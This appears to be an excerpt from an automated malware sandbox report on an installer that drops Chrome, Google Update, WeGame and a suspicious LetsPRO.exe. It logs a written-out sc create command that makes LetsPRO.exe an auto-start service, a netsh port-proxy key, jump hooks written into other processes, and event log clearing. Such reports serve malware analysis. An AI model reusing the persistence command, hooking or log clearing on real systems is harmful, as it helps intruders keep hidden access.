                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5FB.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile created: C:\Users\user\99944\LetsPRO.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\adapt_for_imports.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\Lua51.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\WeGame.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ChromeSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB404.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5FB.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB59C.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB54D.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9575C GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,30_2_6CC9575C
                  Source: C:\Windows\System32\netsh.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,30_2_6CCAA005
                  Source: unknownProcess created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4320 base: 590007 value: E9 EB DF 99 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4320 base: 76F2DFF0 value: E9 1E 20 66 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4564 base: 570007 value: E9 EB DF 9B 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4564 base: 76F2DFF0 value: E9 1E 20 64 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5440 base: 540007 value: E9 EB DF 9E 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5440 base: 76F2DFF0 value: E9 1E 20 61 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4912 base: 1F00007 value: E9 EB DF 02 75 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 4912 base: 76F2DFF0 value: E9 1E 20 FD 8A Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5480 base: 540007 value: E9 EB DF 9E 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5480 base: 76F2DFF0 value: E9 1E 20 61 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5520 base: 2000007 value: E9 EB DF F2 74 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 5520 base: 76F2DFF0 value: E9 1E 20 0D 8B Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 412 base: 690007 value: E9 EB DF 89 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 412 base: 76F2DFF0 value: E9 1E 20 76 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 6408 base: 580007 value: E9 EB DF 9A 76 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 6408 base: 76F2DFF0 value: E9 1E 20 65 89 Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7224 base: 2040007 value: E9 EB DF EE 74
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7224 base: 76F2DFF0 value: E9 1E 20 11 8B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7232 base: 590007 value: E9 EB DF 99 76
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7232 base: 76F2DFF0 value: E9 1E 20 66 89
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7268 base: 690007 value: E9 EB DF 89 76
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7268 base: 76F2DFF0 value: E9 1E 20 76 89
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7284 base: 590007 value: E9 EB DF 99 76
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7284 base: 76F2DFF0 value: E9 1E 20 66 89
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7380 base: 590007 value: E9 EB DF 99 76
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMemory written: PID: 7380 base: 76F2DFF0 value: E9 1E 20 66 89
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_03F3B3C0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94A2E7 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_6C94A2E7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
